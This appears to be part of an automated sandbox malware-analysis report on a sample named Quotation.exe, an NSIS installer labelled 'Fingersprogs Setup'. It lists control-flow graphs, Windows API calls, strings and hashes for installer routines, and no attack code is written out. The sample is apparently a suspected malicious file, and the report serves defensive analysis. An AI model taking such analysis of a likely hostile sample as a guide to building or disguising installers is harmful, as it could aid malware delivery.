                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1952731849.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$CloseFileFirst
                                                                                    • String ID:
                                                                                    • API String ID: 2295610775-0
                                                                                    • Opcode ID: a2d354ff7ed2319fbee56d8d140705e4a76cab61c7ff8bd1d53ab4a71d5363ca
                                                                                    • Instruction ID: 54e165a9d952ab4a9c526d77f24574b80d9b4166436818e4e9d84c3548612847
                                                                                    • Opcode Fuzzy Hash: a2d354ff7ed2319fbee56d8d140705e4a76cab61c7ff8bd1d53ab4a71d5363ca
                                                                                    • Instruction Fuzzy Hash: A5D012315191607FC2501B387F0C84B7A599F65372B114B36B4A6F51E4DA348C628698

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 146 404f70-404f89 147 405111-405123 146->147 148 404f8f-404f95 146->148 149 405125-405165 GetDlgItem * 2 call 4054f8 SetClassLongW call 401533 147->149 150 40516b-40517f 147->150 148->147 151 404f9b-404f9e 148->151 149->150 153 405181-405183 150->153 154 4051bd-4051c2 call 4054c6 150->154 155 404fa0-404fb5 SetWindowPos 151->155 156 404fba-404fbd 151->156 158 4051b5-4051b7 153->158 159 405185-405190 call 401399 153->159 170 4051c7-4051e6 154->170 160 4050fd 155->160 162 40500d-405013 156->162 163 404fbf-404fde ShowWindow 156->163 158->154 168 405488 158->168 159->158 187 405192-4051b0 SendMessageW 159->187 169 405101-40510c call 405739 160->169 164 405015-40502a DestroyWindow 162->164 165 40502f-405032 162->165 163->169 171 404fe4-404ffa GetWindowLongW 163->171 172 40546c-405473 164->172 173 405034-405042 SetWindowLongW 165->173 174 405047-40504d 165->174 176 40548a-405491 168->176 169->176 179 4051e8-4051f3 call 401533 170->179 180 4051f9-4051ff 170->180 171->169 181 405000-405008 ShowWindow 171->181 172->168 183 405475-405477 172->183 173->176 174->160 186 405053-40506d GetDlgItem 174->186 179->180 184 405205-405207 180->184 185 405448-405461 DestroyWindow EndDialog 180->185 181->169 183->168 190 405479-405482 ShowWindow 183->190 184->185 191 40520d-405264 call 405e98 call 4054f8 * 3 GetDlgItem 184->191 194 405467 185->194 192 405092-405097 186->192 193 40506f-405088 SendMessageW IsWindowEnabled 186->193 187->176 190->168 222 405272-4052c1 ShowWindow KiUserCallbackDispatcher * 2 EnableWindow 191->222 223 405266-40526e 191->223 197 405099-40509a 192->197 198 40509c-40509f 192->198 193->168 196 40508e 193->196 194->172 196->192 200 4050dd-4050e2 call 405936 197->200 201 4050a1-4050a8 198->201 202 4050ae-4050b1 198->202 200->169 205 4050e4-4050f7 SendMessageW 201->205 206 4050aa-4050ac 201->206 202->205 207 4050b3-4050ba 202->207 205->160 206->200 210 4050ca-4050d3 call 401533 207->210 211 4050bc-4050c8 call 401533 207->211 210->169 219 4050d5 210->219 218 4050db 211->218 218->200 219->218 224 4052c3-4052c4 222->224 225 4052c6 222->225 223->222 226 4052c7-4052f2 GetSystemMenu EnableMenuItem SendMessageW 224->226 225->226 227 4052f4-405309 SendMessageW 226->227 228 40530b 226->228 229 405311-405357 call 4054e1 call 405cf9 call 406af8 lstrlenW call 405e98 SetWindowTextW call 401399 227->229 228->229 229->170 240 40535d-40535f 229->240 240->170 241 405365-405369 240->241 242 405388-40539c DestroyWindow 241->242 243 40536b-405371 241->243 242->194 245 4053a2-4053cf CreateDialogParamW 242->245 243->168 244 405377-40537d 243->244 244->170 246 405383 244->246 245->172 247 4053d5-40542c call 4054f8 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401399 245->247 246->168 247->168 252 40542e-405441 ShowWindow call 4054c6 247->252 254 405446 252->254 254->194
                                                                                    APIs
                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404FAF
                                                                                    • ShowWindow.USER32(?), ref: 00404FD9
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00404FEA
                                                                                    • ShowWindow.USER32(?,00000004), ref: 00405006
                                                                                    • GetDlgItem.USER32(?,00000001), ref: 0040512D
                                                                                    • GetDlgItem.USER32(?,00000002), ref: 00405137
                                                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 00405151
                                                                                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040519F
                                                                                    • GetDlgItem.USER32(?,00000003), ref: 0040524E
                                                                                    • ShowWindow.USER32(00000000,?), ref: 00405277
                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040528B
                                                                                    • KiUserCallbackDispatcher.NTDLL(?), ref: 0040529F
                                                                                    • EnableWindow.USER32(?), ref: 004052B7
                                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004052CE
                                                                                    • EnableMenuItem.USER32(00000000), ref: 004052D5
                                                                                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004052E6
                                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004052FD
                                                                                    • lstrlenW.KERNEL32(Fingersprogs Setup: Installing,?,Fingersprogs Setup: Installing,00000000), ref: 0040532E
                                                                                      • Part of subcall function 00405E98: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nss582A.tmp\System.dll,?,?,?), ref: 0040604E
                                                                                    • SetWindowTextW.USER32(?,Fingersprogs Setup: Installing), ref: 00405346
                                                                                      • Part of subcall function 00401399: MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
                                                                                      • Part of subcall function 00401399: SendMessageW.USER32(?,00000402,00000000), ref: 00401409
                                                                                    • DestroyWindow.USER32(?,00000000), ref: 0040538E
                                                                                    • CreateDialogParamW.USER32(?,?,-007A8560), ref: 004053C2
                                                                                      • Part of subcall function 004054F8: SetDlgItemTextW.USER32(?,?,00000000), ref: 00405512
                                                                                    • GetDlgItem.USER32(?,000003FA), ref: 004053EB
                                                                                    • GetWindowRect.USER32(00000000), ref: 004053F2
                                                                                    • ScreenToClient.USER32(?,?), ref: 004053FE
                                                                                    • SetWindowPos.USER32(00000000,?,?,00000000,00000000,00000015), ref: 00405417
                                                                                    • ShowWindow.USER32(00000008,?,00000000), ref: 00405436
                                                                                      • Part of subcall function 004054C6: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004054D8
                                                                                    • ShowWindow.USER32(?,0000000A), ref: 0040547C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1950641214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1950628419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950654842.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1952731849.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Item$MessageSendShow$CallbackDispatcherEnableLongMenuTextUser$ClassClientCreateDestroyDialogParamRectScreenSystemlstrcatlstrlen
                                                                                    • String ID: Fingersprogs Setup: Installing
                                                                                    • API String ID: 162979904-1250855830
                                                                                    • Opcode ID: 72123b1cd148b1eb205aab3943036d4082e425be0be4f9ae0839b9c0fe245c6a
                                                                                    • Instruction ID: 456415ec42eff5e8f6a9a9f0208e2dc106d0a6226250255d67da48920511729f
                                                                                    • Opcode Fuzzy Hash: 72123b1cd148b1eb205aab3943036d4082e425be0be4f9ae0839b9c0fe245c6a
                                                                                    • Instruction Fuzzy Hash: 38D1C071904B10ABDB20AF21EE44A6B7B68FB89355F00853EF545B21E1CA3D8851CFAD

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 255 405a1c-405a37 call 4068c4 258 405a39-405a49 call 4065fd 255->258 259 405a4b-405a81 call 406955 255->259 268 405aa4-405acd call 40595d call 406616 258->268 264 405a83-405a94 call 406955 259->264 265 405a99-405a9f lstrcatW 259->265 264->265 265->268 273 405ad3-405ad8 268->273 274 405b65-405b6d call 406616 268->274 273->274 275 405ade-405af9 call 406955 273->275 280 405b7b-405ba9 LoadImageW 274->280 281 405b6f-405b76 call 405e98 274->281 279 405afe-405b07 275->279 279->274 282 405b09-405b0f 279->282 284 405c28-405c30 call 401533 280->284 285 405bab-405bd6 RegisterClassW 280->285 281->280 286 405b11-405b1f call 4065d4 282->286 287 405b22-405b30 lstrlenW 282->287 296 405ce2-405ce4 284->296 297 405c36-405c41 call 40595d 284->297 288 405bd8-405bda 285->288 289 405bdf-405c23 SystemParametersInfoW CreateWindowExW 285->289 286->287 293 405b32-405b40 lstrcmpiW 287->293 294 405b58-405b60 call 406534 call 406af8 287->294 295 405ce5-405cec 288->295 289->284 293->294 300 405b42-405b4c GetFileAttributesW 293->300 294->274 296->295 308 405c47-405c61 ShowWindow call 40617c 297->308 309 405cc9-405cd1 call 405842 297->309 303 405b52-405b53 call 406cee 300->303 304 405b4e-405b50 300->304 303->294 304->294 304->303 316 405c63-405c68 call 40617c 308->316 317 405c6d-405c7e GetClassInfoW 308->317 314 405cd3-405cd9 309->314 315 405ced-405cef call 401533 309->315 314->296 318 405cdb-405cdd call 401533 314->318 324 405cf4 315->324 316->317 321 405c80-405c94 GetClassInfoW RegisterClassW 317->321 322 405c96-405cb9 DialogBoxParamW call 401533 317->322 318->296 321->322 326 405cbe-405cc7 call 403cd6 322->326 324->324 326->295
                                                                                    APIs
                                                                                      • Part of subcall function 004068C4: GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,004037EE,0000000B), ref: 004068D2
                                                                                      • Part of subcall function 004068C4: GetProcAddress.KERNEL32(00000000), ref: 004068EE
                                                                                    • lstrcatW.KERNEL32(1033,Fingersprogs Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Fingersprogs Setup: Installing,00000000,00000002,00000000,76F93420,00000000,76F93170), ref: 00405A9F
                                                                                    • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,007B3800,1033,Fingersprogs Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Fingersprogs Setup: Installing,00000000,00000002,00000000), ref: 00405B23
                                                                                    • lstrcmpiW.KERNEL32(-000000FC,.exe,Call,?,?,?,Call,00000000,007B3800,1033,Fingersprogs Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Fingersprogs Setup: Installing,00000000), ref: 00405B38
                                                                                    • GetFileAttributesW.KERNEL32(Call), ref: 00405B43
                                                                                    • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,007B3800), ref: 00405B8C
                                                                                      • Part of subcall function 004065FD: wsprintfW.USER32 ref: 0040660A
                                                                                    • RegisterClassW.USER32(007A74E0), ref: 00405BD1
                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405BE8
                                                                                    • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405C1D
                                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00405C4F
                                                                                    • GetClassInfoW.USER32(00000000,RichEdit20W,007A74E0), ref: 00405C7A
                                                                                    • GetClassInfoW.USER32(00000000,RichEdit,007A74E0), ref: 00405C87
                                                                                    • RegisterClassW.USER32(007A74E0), ref: 00405C94
                                                                                    • DialogBoxParamW.USER32(?,00000000,00404F70,00000000), ref: 00405CAF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1950641214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1950628419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950654842.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1952731849.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                    • String ID: .DEFAULT\Control Panel\International$.exe$1033$Call$Control Panel\Desktop\ResourceLocale$Fingersprogs Setup: Installing$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$tz
                                                                                    • API String ID: 1975747703-3579355919
                                                                                    • Opcode ID: d8277d97e2f230740c86ea31856198af6673e632619b6bda425b05bf07e2b6f7
                                                                                    • Instruction ID: 09b92c81f8f4ef2e2e9fd8d830fcc712f1cdd6db1c368b512ccdb95b409c048d
                                                                                    • Opcode Fuzzy Hash: d8277d97e2f230740c86ea31856198af6673e632619b6bda425b05bf07e2b6f7
                                                                                    • Instruction Fuzzy Hash: 31611370604604BEE7107B65AD42F2B366CEB46748F11813EF941B61E2EB3CA9108FAD

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 515 4033cb-403418 GetTickCount GetModuleFileNameW call 4068f9 518 403424-403454 call 406af8 call 406cee call 406af8 GetFileSize 515->518 519 40341a-40341f 515->519 527 403550-40355f call 403367 518->527 528 40345a 518->528 520 403623-40362a 519->520 533 403565-403567 527->533 534 40361e 527->534 530 40345e-403484 call 40311b 528->530 536 403616-40361d call 403367 530->536 537 40348a-403491 530->537 538 403598-4035c8 GlobalAlloc call 403131 call 403148 533->538 539 403569-403581 call 403131 call 406926 533->539 534->520 536->534 540 403512-403515 537->540 541 403493-4034ac call 406692 537->541 538->534 565 4035ca-4035dc 538->565 561 403586-403588 539->561 548 403517-40351e call 403367 540->548 549 40351f-403525 540->549 541->549 558 4034ae-4034b6 541->558 548->549 551 403527-403536 call 406e1a 549->551 552 40353a-403542 549->552 551->552 552->530 560 403548-40354c 552->560 558->549 564 4034b8-4034c0 558->564 560->527 561->534 566 40358e-403592 561->566 564->549 567 4034c2-4034ca 564->567 568 4035e4-4035e7 565->568 569 4035de 565->569 566->534 566->538 567->549 570 4034cc-4034d4 567->570 571 4035ea-4035f2 568->571 569->568 570->549 572 4034d6-4034f5 570->572 571->571 573 4035f4-40360d SetFilePointer call 406692 571->573 572->534 574 4034fb-403501 572->574 577 403612-403614 573->577 574->560 576 403503-40350c 574->576 576->549 578 40350e-403510 576->578 577->520 578->549
                                                                                    APIs
                                                                                    • GetTickCount.KERNEL32 ref: 004033DE
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Quotation.exe,00000400), ref: 004033FA
                                                                                      • Part of subcall function 004068F9: GetFileAttributesW.KERNELBASE(?,0040340D,C:\Users\user\Desktop\Quotation.exe,80000000,00000003), ref: 004068FD
                                                                                      • Part of subcall function 004068F9: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000000,00000000), ref: 0040691D
                                                                                    • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Quotation.exe,C:\Users\user\Desktop\Quotation.exe,80000000,00000003), ref: 00403444
                                                                                    • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040359E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1950641214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1950628419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950654842.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1952731849.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                    • String ID: C:\Users\user\Desktop$C:\Users\user\Desktop\Quotation.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                    • API String ID: 2803837635-2520809451
                                                                                    • Opcode ID: 89db09ba3d9e86f9c075612005f46009679623d63feb2a5cce1b372a96914bed
                                                                                    • Instruction ID: 8295773d5102a3db2c924d587f32f5b95c2827ef7f93a52122a4f4d2b553c90e
                                                                                    • Opcode Fuzzy Hash: 89db09ba3d9e86f9c075612005f46009679623d63feb2a5cce1b372a96914bed
                                                                                    • Instruction Fuzzy Hash: B951D371904300AFD720AF25DD81B1B7AA8BB8471AF10453FF955B62E1CB3D8E548B6E

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 579 405e98-405ea1 580 405ea3-405eb2 579->580 581 405eb4-405ecf 579->581 580->581 582 405ed1-405edc 581->582 583 405ee6-405eed 581->583 582->583 584 405ede-405ee2 582->584 585 4060e1-4060e8 583->585 586 405ef3-405ef6 583->586 584->583 587 4060f3 585->587 588 4060ea-4060f1 call 406af8 585->588 589 405ef7-405f05 586->589 593 4060f5-4060fb 587->593 588->593 590 405f0b-405f16 589->590 591 4060dc-4060e0 589->591 594 4060b5 590->594 595 405f1c-405f60 590->595 591->585 599 4060c3 594->599 600 4060b7-4060c1 594->600 597 406060-406063 595->597 598 405f66-405f77 595->598 603 406065-406068 597->603 604 406099-40609c 597->604 601 405fb7-405fba 598->601 602 405f79-405f97 call 406955 598->602 605 4060c6 599->605 600->605 609 405fca-405fcd 601->609 610 405fbc-405fc8 GetSystemDirectoryW 601->610 615 405f9c-405fa5 602->615 611 406078-40608f call 406af8 603->611 612 40606a-406076 call 4065fd 603->612 607 4060a7-4060b3 lstrlenW 604->607 608 40609e-4060a2 call 405e98 604->608 613 4060c8-4060d6 605->613 607->613 608->607 618 405fdd-405fe5 609->618 619 405fcf-405fdb GetWindowsDirectoryW 609->619 617 406038 610->617 611->607 629 406091-406097 call 406d1b 611->629 612->607 613->589 613->591 622 40603c-406041 615->622 623 405fab-405fb2 call 405e98 615->623 617->622 624 405fe7-405ff0 618->624 625 405ffc-406012 SHGetSpecialFolderLocation 618->625 619->617 630 406043-406046 622->630 631 406054-40605e call 406d1b 622->631 623->622 633 405ff8-405ffa 624->633 627 406014-40602d SHGetPathFromIDListW CoTaskMemFree 625->627 628 40602f-406036 625->628 627->617 627->628 628->617 628->618 629->607 630->631 635 406048-40604e lstrcatW 630->635 631->607 633->617 633->625 635->631
                                                                                    APIs
                                                                                    • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00405FC2
                                                                                      • Part of subcall function 00406AF8: lstrcpynW.KERNEL32(?,?,00000400,0040384F,007A7540,NSIS Error), ref: 00406B05
                                                                                      • Part of subcall function 00406D1B: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406D90
                                                                                      • Part of subcall function 00406D1B: CharNextW.USER32(?,?,?,00000000), ref: 00406D9F
                                                                                      • Part of subcall function 00406D1B: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406DA4
                                                                                      • Part of subcall function 00406D1B: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406DBC
                                                                                    • GetWindowsDirectoryW.KERNEL32(Call,00000400,Skipped: C:\Users\user\AppData\Local\Temp\nss582A.tmp\System.dll,?,?,?), ref: 00405FD5
                                                                                    • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nss582A.tmp\System.dll,?,?,?), ref: 0040604E
                                                                                    • lstrlenW.KERNEL32(Call,Skipped: C:\Users\user\AppData\Local\Temp\nss582A.tmp\System.dll,?,?,?), ref: 004060A8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1950641214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1950628419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950654842.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1952731849.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: Char$Next$Directory$PrevSystemWindowslstrcatlstrcpynlstrlen
                                                                                    • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nss582A.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                    • API String ID: 4187626192-2065450760
                                                                                    • Opcode ID: 90908ed2b1fff3d7c45b9d6734c0443e5caff99512698a5aebad6b02f2870112
                                                                                    • Instruction ID: e5fb9ae88836c379eadb94168964a2c41ebb3bf79b6cd8bfde1838e31315b013
                                                                                    • Opcode Fuzzy Hash: 90908ed2b1fff3d7c45b9d6734c0443e5caff99512698a5aebad6b02f2870112
                                                                                    • Instruction Fuzzy Hash: 0E6115716442159BDB24AB288C40A3B76A4EF99350F11853FF982F72D1EB3CC9258B5E

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 930 405d18-405d24 931 405df5-405df9 930->931 932 405d2a-405d3d 930->932 933 405d49-405d59 lstrlenW 932->933 934 405d3f-405d44 call 405e98 932->934 936 405d5b-405d6a lstrlenW 933->936 937 405d7e 933->937 934->933 938 405d70-405d7c lstrcatW 936->938 939 405df2-405df4 936->939 940 405d83-405d86 937->940 938->940 939->931 941 405d95-405d98 940->941 942 405d88-405d8f SetWindowTextW 940->942 943 405de0-405de2 941->943 944 405d9a-405dde SendMessageW * 3 941->944 942->941 943->939 945 405de4-405dea 943->945 944->943 945->939
                                                                                    APIs
                                                                                    • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nss582A.tmp\System.dll,?,00000000,?,?), ref: 00405D4A
                                                                                    • lstrlenW.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nss582A.tmp\System.dll,?,00000000,?,?), ref: 00405D5C
                                                                                    • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nss582A.tmp\System.dll,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nss582A.tmp\System.dll,?,00000000,?,?), ref: 00405D77
                                                                                    • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nss582A.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nss582A.tmp\System.dll), ref: 00405D8F
                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405DB6
                                                                                    • SendMessageW.USER32(?,0000104D,00000000,?), ref: 00405DD1
                                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405DDE
                                                                                      • Part of subcall function 00405E98: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nss582A.tmp\System.dll,?,?,?), ref: 0040604E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1950641214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1950628419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950654842.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
